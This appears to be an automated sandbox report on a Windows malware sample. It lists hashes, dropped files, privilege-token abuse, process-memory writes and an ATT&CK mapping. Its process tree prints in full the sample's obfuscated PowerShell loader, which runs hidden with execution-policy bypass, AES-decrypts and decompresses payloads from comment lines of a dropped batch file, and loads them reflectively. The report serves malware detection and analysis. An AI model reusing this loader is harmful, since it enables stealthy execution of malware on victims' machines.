154e25a046f1f9604edd46c621d037753819c4e5bca9f147c08eab91fd19ef4d

General

Target

0DACC9DE5E9AFF7B06742BDBC.exe
Size

8KB
MD5

0dacc9de5e9aff7b06742bdbc0407f8f
SHA1

79d005840270c90d5723869d81f88c5fbf5a2988
SHA256

154e25a046f1f9604edd46c621d037753819c4e5bca9f147c08eab91fd19ef4d
SHA512

23e233352ba1799b6c20a734bb0938b519ee6905748b6fadbac3a9adb0422149e5faa8b8d37a393448d5bed0b036edd6a54b64eecdc751088cd8262beea993db
SSDEEP

192:/jsfG576wSKHL5bXJLcecsn2f/LpLgLxZrjtXf35Djoi:/ofGdSgL5bZL5csQ/LpLgLxpZf35Djo

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
2224	05a1fdc0-0f75-4bd6-b8b0-253e80677c1f.bat.exe

Loads dropped DLL 1 IoCs

pid	Process
1704	cmd.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\$sxr-seroxen2\$sxr-Uni.bat	cmd.exe
File opened for modification	C:\Windows\$sxr-seroxen2\$sxr-Uni.bat	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2224	05a1fdc0-0f75-4bd6-b8b0-253e80677c1f.bat.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1644	0DACC9DE5E9AFF7B06742BDBC.exe
Token: SeDebugPrivilege	2224	05a1fdc0-0f75-4bd6-b8b0-253e80677c1f.bat.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1644 wrote to memory of 1704	1644	0DACC9DE5E9AFF7B06742BDBC.exe	29
PID 1644 wrote to memory of 1704	1644	0DACC9DE5E9AFF7B06742BDBC.exe	29
PID 1644 wrote to memory of 1704	1644	0DACC9DE5E9AFF7B06742BDBC.exe	29
PID 1704 wrote to memory of 2284	1704	cmd.exe	31
PID 1704 wrote to memory of 2284	1704	cmd.exe	31
PID 1704 wrote to memory of 2284	1704	cmd.exe	31
PID 2284 wrote to memory of 908	2284	net.exe	32
PID 2284 wrote to memory of 908	2284	net.exe	32
PID 2284 wrote to memory of 908	2284	net.exe	32
PID 1704 wrote to memory of 2224	1704	cmd.exe	33
PID 1704 wrote to memory of 2224	1704	cmd.exe	33
PID 1704 wrote to memory of 2224	1704	cmd.exe	33

C:\Users\Admin\AppData\Local\Temp\0DACC9DE5E9AFF7B06742BDBC.exe
"C:\Users\Admin\AppData\Local\Temp\0DACC9DE5E9AFF7B06742BDBC.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1644
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C cd /d %systemdrive% & C:\Users\Admin\AppData\Local\Temp\05a1fdc0-0f75-4bd6-b8b0-253e80677c1f.bat & exit
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:1704
- - C:\Windows\system32\net.exe
    net session
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2284
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:908
- - C:\Users\Admin\AppData\Local\Temp\05a1fdc0-0f75-4bd6-b8b0-253e80677c1f.bat.exe
    "05a1fdc0-0f75-4bd6-b8b0-253e80677c1f.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function oaivM($myPoe){ $CZsUH=[System.Security.Cryptography.Aes]::Create(); $CZsUH.Mode=[System.Security.Cryptography.CipherMode]::CBC; $CZsUH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $CZsUH.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yq+Zf+/Xlwd1bzzTJFdmk2PzHxMZexiaAcpua2TkdOw='); $CZsUH.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VjvWSvzOMCdiOVrsv1q6ZA=='); $NXPuk=$CZsUH.CreateDecryptor(); $return_var=$NXPuk.TransformFinalBlock($myPoe, 0, $myPoe.Length); $NXPuk.Dispose(); $CZsUH.Dispose(); $return_var;}function JJFPJ($myPoe){ $ziGsx=New-Object System.IO.MemoryStream(,$myPoe); $BZpym=New-Object System.IO.MemoryStream; $FSqNe=New-Object System.IO.Compression.GZipStream($ziGsx, [IO.Compression.CompressionMode]::Decompress); $FSqNe.CopyTo($BZpym); $FSqNe.Dispose(); $ziGsx.Dispose(); $BZpym.Dispose(); $BZpym.ToArray();}function iBkVP($myPoe,$gUuoh){ $XEvFy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$myPoe); $uVxqb=$XEvFy.EntryPoint; $uVxqb.Invoke($null, $gUuoh);}$lQJVS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\05a1fdc0-0f75-4bd6-b8b0-253e80677c1f.bat').Split([Environment]::NewLine);foreach ($wdXwY in $lQJVS) { if ($wdXwY.StartsWith(':: ')) { $eKPyG=$wdXwY.Substring(4); break; }}$DKqql=[string[]]$eKPyG.Split('\');$dkbuf=JJFPJ (oaivM ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($DKqql[0])));$LxbFQ=JJFPJ (oaivM ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($DKqql[1])));iBkVP $LxbFQ (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));iBkVP $dkbuf (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2224

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\05a1fdc0-0f75-4bd6-b8b0-253e80677c1f.bat

Filesize
12.6MB

MD5
126fae8fc1e81682b4f7395b1d78b60e

SHA1
455103a9ea6636a83d2955d49bcc6c4f87ae0b41

SHA256
fb3bf34a441224c83ba1323e502dc27160d5ec2014d921ae476c38e8d65e0d5c

SHA512
245344134db22835adc7d3c4daabe3fe01a9e79fcd44f6cded4cbbf298217d2b0ecc894a9740bb9f7b4c656409ec88f46f3c5c09d28757728062c4b93db0baf1

Download Submit
C:\Users\Admin\AppData\Local\Temp\05a1fdc0-0f75-4bd6-b8b0-253e80677c1f.bat.exe

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
\Users\Admin\AppData\Local\Temp\05a1fdc0-0f75-4bd6-b8b0-253e80677c1f.bat.exe

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/1644-54-0x000000013F9A0000-0x000000013F9A6000-memory.dmp

Filesize
24KB

Download
memory/1644-55-0x0000000002260000-0x00000000022E0000-memory.dmp

Filesize
512KB

Download
memory/1644-60-0x0000000002260000-0x00000000022E0000-memory.dmp

Filesize
512KB

Download
memory/2224-66-0x0000000002770000-0x00000000027F0000-memory.dmp

Filesize
512KB

Download
memory/2224-67-0x000000001AFD0000-0x000000001B2B2000-memory.dmp

Filesize
2.9MB

Download
memory/2224-68-0x0000000002770000-0x00000000027F0000-memory.dmp

Filesize
512KB

Download
memory/2224-69-0x0000000001EC0000-0x0000000001EC8000-memory.dmp

Filesize
32KB

Download
memory/2224-70-0x0000000002774000-0x0000000002777000-memory.dmp

Filesize
12KB

Download
memory/2224-71-0x000000000277B000-0x00000000027B2000-memory.dmp

Filesize
220KB

Download

Analysis

Sharing